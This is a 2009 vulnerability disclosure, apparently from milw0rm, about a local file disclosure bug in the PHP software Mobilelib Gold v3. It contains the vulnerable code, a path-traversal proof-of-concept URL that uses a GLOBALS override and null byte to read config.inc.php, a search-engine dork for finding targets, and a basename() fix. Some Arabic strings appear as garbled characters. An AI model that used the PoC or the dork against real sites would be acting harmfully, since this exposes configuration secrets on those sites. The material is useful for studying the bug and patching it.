|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` =Vuln: Mobilelib Gold v3 Local File Disclosure Vulnerability =INFO: http://www.ac4p.com/ =BUY: http://www.ac4p.com/ =Download: ~~~ =DORK: intext:"English for dummies" ____________ _-=/:Conditions:\=-_ ```````````````````````````````````````````````````````````````````````````````` Magic_quotes MUST BE ON :) ---------------------------------------===-------------------------------------- _________________ _-=/:Vulnerable_Code:\=-_ ```````````````````````````````````````````````````````````````````````````````` // in "./myhtml.php" function getthememyhtml($page) { if (file_exists("./myhtmlpages/".$page.".html")) { $templat="./myhtmlpages/".$page.".html"; $tempindex=@fopen($templat,"r"); $html=@fread($tempindex,@filesize($templat)); @fclose($tempindex); } else { $html ="
áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.
"; } return $html; } ---------------------------------------===-------------------------------------- _______ _-=/:P.o.C:\=-_ ```````````````````````````````````````````````````````````````````````````````` We will bypass the security, where it takes all _GET variables and scans if they contain harmful tags such as the null char (%00) ..etc We will bypass it by using an old GLOBALS[] trick ;) http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00 ---------------------------------------===-------------------------------------- __________ _-=/:SOLUTION:\=-_ ```````````````````````````````````````````````````````````````````````````````` // in "./myhtml.php" function getthememyhtml($page) { $page = basename($page); //<---- Added the good old Basename func ;) if (file_exists("./myhtmlpages/".$page.".html")) { $templat="./myhtmlpages/".$page.".html"; $tempindex=@fopen($templat,"r"); $html=@fread($tempindex,@filesize($templat)); @fclose($tempindex); } else { $html ="áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.
"; } return $html; } ---------------------------------------===-------------------------------------- ______________________________________________________________________________ / \ | Sec-Code.com ;) Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!! | \______________________________________________________________________________/ \ No More Private / ````````````````` Salamz to All Muslim Hackers. # milw0rm.com [2009-07-14]